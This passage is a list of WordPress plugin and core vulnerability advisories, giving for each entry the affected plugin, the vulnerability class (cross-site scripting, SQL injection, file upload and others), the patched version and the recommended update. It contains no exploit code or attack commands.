Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 2.8.6
Recommended Action: Update to version 2.8.6, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Authenticated Shell Upload
Patched Version: 4.22
Recommended Action: Update to version 4.22, or a newer patched version

Plugin: WebEngage Feedback, Survey and Notification

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Core: WordPress

Vulnerability: PHAR Unserialization
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Plugin: Translate WordPress – Google Language Translator

Vulnerability: Google Language Translator <= 6.0.11
Patched Version: 6.0.12
Recommended Action: Update to version 6.0.12, or a newer patched version

Plugin: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings

Vulnerability: Authenticated (Contributor+) Local File Inclusion
Patched Version: 1.0.107.3
Recommended Action: Update to version 1.0.107.3, or a newer patched version

Plugin: Form Builder | Create Responsive Contact Forms

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Brizy – Page Builder

Vulnerability: Authenticated Stored Cross-Site Scripting via Element URL
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: CP Reservation Calendar

Vulnerability: SQL Injection
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: YouTube Embed

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Captcha!

Vulnerability: Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Customize Login Image

Vulnerability: Cross-Site Scripting
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Admin+ SQL Injection
Patched Version: 17.0.5
Recommended Action: Update to version 17.0.5, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.5.0
Recommended Action: Update to version 3.5.0, or a newer patched version

Plugin: Enable/Disable Auto Login when Register

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tussendoor – Open RDW

Vulnerability: Reflected Cross-Site Scripting via open_data_rdw_kenteken
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: WPBakery Page Builder for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.4.1
Recommended Action: Update to version 6.4.1, or a newer patched version

Core: WordPress

Vulnerability: No subtitle
Patched Version: 4.1.39
Recommended Action: Update to one of the following versions, or a newer patched version: 4.1.39, 4.2.36, 4.3.32, 4.4.31, 4.5.30, 4.6.27, 4.7.27, 4.8.23, 4.9.24, 5.0.20, 5.1.17, 5.2.19, 5.3.16, 5.4.14, 5.5.13, 5.6.12, 5.7.10, 5.8.8, 5.9.8, 6.0.6, 6.1.4, 6.2.3, 6.3.2

Plugin: DeepL API translation plugin

Vulnerability: Cross-Site Request Forgery via saveSettings
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: HTML2WP

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CBX Map for Google Map & OpenStreetMap

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.1.12
Recommended Action: Update to version 1.1.12, or a newer patched version

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: Banner Effect Header

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: WP Smart Import : Import any XML File to WordPress

Vulnerability: Server-Side Request Forgery
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Website Contact Form With File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Sensitive Information Exposure
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Five Star Restaurant Reservations – WordPress Booking Plugin

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 2.4.12
Recommended Action: Update to version 2.4.12, or a newer patched version

Plugin: AgentEasy Properties

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn)

Vulnerability: Missing Authorization to Plugin Settings Update
Patched Version: 7.5.13
Recommended Action: Update to version 7.5.13, or a newer patched version

Plugin: SEO Redirection Plugin – 301 Redirect Manager

Vulnerability: Subscriber+ SQL Injection
Patched Version: 8.2
Recommended Action: Update to version 8.2, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: PDF Builder for WooCommerce. Create invoices,packing slips and more

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 1.2.92
Recommended Action: Update to version 1.2.92, or a newer patched version

Plugin: Pagination by BestWebSoft – Customizable WordPress Content Splitter and Navigation Plugin

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: WordPress Renaming Tool by Vlajo

Vulnerability: Path Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Floating Button

Vulnerability: Cross-Site Request Forgery via process_bulk_action
Patched Version: 6.0.1
Recommended Action: Update to version 6.0.1, or a newer patched version

Plugin: Timed Popup WordPress Plugin

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Annual Archive

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MailUp newsletter sign-up form

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Core: WordPress MU

Vulnerability: Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Vision – Interactive Image Map Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: GTM4WP – A Google Tag Manager (GTM) plugin for WordPress

Vulnerability: Stored Cross-Site Scripting via Content Element ID
Patched Version: 1.15.2
Recommended Action: Update to version 1.15.2, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: wpDataTables (Premium)

Vulnerability: Improper Access Control leading to Table Data Deletion
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Melapress File Monitor

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.9.11
Recommended Action: Update to version 2.0.9.11, or a newer patched version

Plugin: RokIntroScroller

Vulnerability: Arbitrary File Upload
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: WP Upload Restriction

Vulnerability: Missing Authorization Checks
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Database Peek

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: acf-frontend-display

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Administrator Z

Vulnerability: Unauthorized File Upload via ACF
Patched Version: 2022.9.29
Recommended Action: Update to version 2022.9.29, or a newer patched version

Plugin: Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back

Vulnerability: Cross-Site Request Forgery via cbb_submit_settings_data
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Total Donations

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Event Registration Calendar By vcita

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.1.7
Recommended Action: Update to version 5.1.7, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Open Redirect
Patched Version: 3.7.2.4
Recommended Action: Update to version 3.7.2.4, or a newer patched version

Plugin: WP Recipe Maker

Vulnerability: Reflected Cross-Site Scripting via Referer
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 7.3.5
Recommended Action: Update to version 7.3.5, or a newer patched version

Plugin: Waitlist Woocommerce ( Back in stock notifier )

Vulnerability: Cross-Site Request Forgery to Settings Reset
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Authenticated (Admin+) Directory Traversal to Arbitrary File Deletion
Patched Version: 0.9.1.7
Recommended Action: Update to version 0.9.1.7, or a newer patched version

Plugin: gAppointments – Appointment booking addon for Gravity Forms

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.5.0
Recommended Action: Update to version 5.5.0, or a newer patched version

Plugin: MP3-jPlayer

Vulnerability: Full Path Disclosure
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Custom 404 Pro

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: WordPress Pinterest Plugin – Make a Popup, User Profile, Masonry and Gallery Layout

Vulnerability: Stored (Contributor+) Cross-Site Scripting via Shortcode
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Cart66 Lite :: WordPress Ecommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.1.15
Recommended Action: Update to version 1.5.1.15, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: I Recommend This

Vulnerability: SQL Injection
Patched Version: 3.7.3
Recommended Action: Update to version 3.7.3, or a newer patched version

Plugin: WordPress Infinite Scroll – Ajax Load More

Vulnerability: SQL Injection
Patched Version: 5.3.2
Recommended Action: Update to version 5.3.2, or a newer patched version

Plugin: Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder

Vulnerability: Insecure Direct Object Reference
Patched Version: 5.0.9
Recommended Action: Update to version 5.0.9, or a newer patched version

Plugin: Nextend Social Login and Register

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Database Backup for WordPress

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: GD Star Rating

Vulnerability: Blind SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Search Exclude

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Zendesk Support for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.5
Recommended Action: Update to version 1.8.5, or a newer patched version

Plugin: Forget About Shortcode Buttons

Vulnerability: Missing Authorization via fasc_buttons
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Tainacan

Vulnerability: Cross-Site Scripting
Patched Version: 0.18.10
Recommended Action: Update to version 0.18.10, or a newer patched version

Plugin: Five Minute Webshop

Vulnerability: Authenticated (Admin+) SQL Injection via orderby
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via cg_option_id
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Core: WordPress

Vulnerability: Cache Poisoning
Patched Version: 3.7.31
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.31, 3.8.31, 3.9.29, 4.0.28, 4.1.28, 4.2.25, 4.3.21, 4.4.20, 4.5.19, 4.6.16, 4.7.15, 4.8.11, 4.9.12, 5.0.7, 5.1.3, 5.2.4

Plugin: Media Library Assistant

Vulnerability: Remote Code Execution via tax_query, meta_query, date_query Parameters
Patched Version: 2.82
Recommended Action: Update to version 2.82, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Goods Catalog

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HDW WordPress Video Gallery

Vulnerability: Reflected Cross-Site Scripting via playlist parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation and Deactivation
Patched Version: 13.1.2
Recommended Action: Update to version 13.1.2, or a newer patched version

Plugin: SMS Alert Order Notifications – WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.7
Recommended Action: Update to version 3.4.7, or a newer patched version

Plugin: Activity Log – Monitor & Record User Changes

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Quttera Web Malware Scanner

Vulnerability: Sensitive Data Exposure
Patched Version: 3.4.2.1
Recommended Action: Update to version 3.4.2.1, or a newer patched version

Plugin: Userback

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: WP Contact Slider – Slide Out Contact Form for WordPress to display Contact Form 7, Gravity Forms, WP Forms, Ninja Forms, plain text/HTML & other shortcodes

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: 001 Prime Strategy Translate Accelerator

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popup Manager

Vulnerability: Missing Authorization to Arbitrary Popup Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Activity Reactions For Buddypress

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Activity Log – Monitor & Record User Changes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: SQL Injection
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Simple CSV/XLS Exporter

Vulnerability: CSV Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Hidden Login Bypass
Patched Version: 7.9.1
Recommended Action: Update to version 7.9.1, or a newer patched version

Plugin: Rich Table of Contents

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Code Snippets Extended

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Content Repeater – Custom Posts Simplified

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Widget
Patched Version: 1.8.19
Recommended Action: Update to version 1.8.19, or a newer patched version

Plugin: JetWidgets For Elementor

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: MagicForm

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Symposium

Vulnerability: Blind SQL Injection
Patched Version: 15.8
Recommended Action: Update to version 15.8, or a newer patched version

Plugin: Booster Plus for WooCommerce

Vulnerability: Cross-Site Request Forgery leading to Arbitrary Custom Role Creation/Deletion
Patched Version: 5.6.6
Recommended Action: Update to version 5.6.6, or a newer patched version

Plugin: wpShopGermany – Protected Shops

Vulnerability: Protected Shops <= 2.0
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: 1.9.11
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Flowplayer Video Player

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: WordPress Poll

Vulnerability: SQL Injection
Patched Version: 34.06
Recommended Action: Update to version 34.06, or a newer patched version

Plugin: Universal Star Rating

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WTI Like Post

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: CM Download Manager – Document and File Management

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.8.0
Recommended Action: Update to version 2.8.0, or a newer patched version

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 5.185.1
Recommended Action: Update to version 5.185.1, or a newer patched version

Plugin: iQ Block Country

Vulnerability: Admin+ Arbitrary File Deletion via Zip Slip
Patched Version: 1.2.13
Recommended Action: Update to version 1.2.13, or a newer patched version

Plugin: TagGator

Vulnerability: SQL Injection
Patched Version: 1.33
Recommended Action: Update to version 1.33, or a newer patched version

Plugin: WP Cumulus

Vulnerability: Sensitive Information Exposure
Patched Version: 1.23
Recommended Action: Update to version 1.23, or a newer patched version

Plugin: Photo Gallery by Ays – Responsive Image Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.2.7
Recommended Action: Update to version 5.2.7, or a newer patched version

Plugin: Twitter Cards Meta – Best Twitter Card Plugin for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: Adapta RGPD

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Cross-Site Scripting
Patched Version: 8.0.08
Recommended Action: Update to version 8.0.08, or a newer patched version

Plugin: Church Admin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.7.6
Recommended Action: Update to version 3.7.6, or a newer patched version

Plugin: wpShopGermany IT-RECHT KANZLEI

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: WP Favorite Posts

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: Simple Job Board

Vulnerability: Missing Authorization
Patched Version: 2.10.6
Recommended Action: Update to version 2.10.6, or a newer patched version

Core: WordPress

Vulnerability: Missing Authorization
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: WordPress Responsive Preview

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated Open Redirect
Patched Version: 3.3.19.1
Recommended Action: Update to version 3.3.19.1, or a newer patched version

Plugin: Auto Featured Image (Auto Post Thumbnail)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via import
Patched Version: 3.6.11
Recommended Action: Update to version 3.6.11, or a newer patched version

Plugin: Transposh WordPress Translation

Vulnerability: Unauthorized Settings Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: cformsII

Vulnerability: Arbitrary File Upload
Patched Version: 14.8
Recommended Action: Update to version 14.8, or a newer patched version

Plugin: WDSocialWidgets

Vulnerability: SQL Injection
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Banner Management For WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: simpleflickr

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RokStories

Vulnerability: Full Path Disclosure
Patched Version: 1.26
Recommended Action: Update to version 1.26, or a newer patched version

Plugin: WP BaiDu Submit

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gallery PhotoBlocks

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)

Vulnerability: Authenticated Stored Cross-Site Scripting via Title & Description
Patched Version: 9.8.0
Recommended Action: Update to version 9.8.0, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.11.1
Recommended Action: Update to version 2.7.11.1, or a newer patched version

Plugin: BackUpWordPress

Vulnerability: Remote File Inclusion
Patched Version: 0.4.3
Recommended Action: Update to version 0.4.3, or a newer patched version

Plugin: Simple Quotation

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 301 Redirects – Easy Redirect Manager

Vulnerability: Easy Redirect Manager <= 2.72
Patched Version: 2.73
Recommended Action: Update to version 2.73, or a newer patched version

Plugin: Testimonial WordPress Plugin – AP Custom Testimonial

Vulnerability: SQL Injection
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: WPPizza – A Restaurant Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.17.2
Recommended Action: Update to version 3.17.2, or a newer patched version

Plugin: Crayon Syntax Highlighter

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Easy Gallery – WordPress Gallery Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: WP Maintenance Mode & Site Under Construction

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Installation/Activation
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: MainWP Maintenance Extension

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Plugin: Like Button Rating ♥ LikeBtn

Vulnerability: Arbitrary Settings Change
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: WP Brutal AI

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.06
Recommended Action: Update to version 2.06, or a newer patched version

Plugin: wp-live-chat-support-pro

Vulnerability: Arbitrary File Upload
Patched Version: 8.0.27
Recommended Action: Update to version 8.0.27, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 3.2.49
Recommended Action: Update to version 3.2.49, or a newer patched version

Plugin: Push Notification for Post and BuddyPress

Vulnerability: Missing Authorization to Unauthenticated Admin Notice Dismissal
Patched Version: 1.64
Recommended Action: Update to version 1.64, or a newer patched version

Plugin: HTML5 SoundCloud Player with Playlist Free

Vulnerability: Authenticated (Author+) PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YASR – Yet Another Star Rating Plugin for WordPress

Vulnerability: Missing Authorization to Vote Tampering
Patched Version: 3.3.9
Recommended Action: Update to version 3.3.9, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via ‘pages’ parameter
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Protect WP Admin

Vulnerability: Unauthenticated Plugin Deactivation
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: Image Gallery – Responsive Photo Gallery

Vulnerability: Responsive Photo Gallery <= 1.7.0
Patched Version: 1.7.1
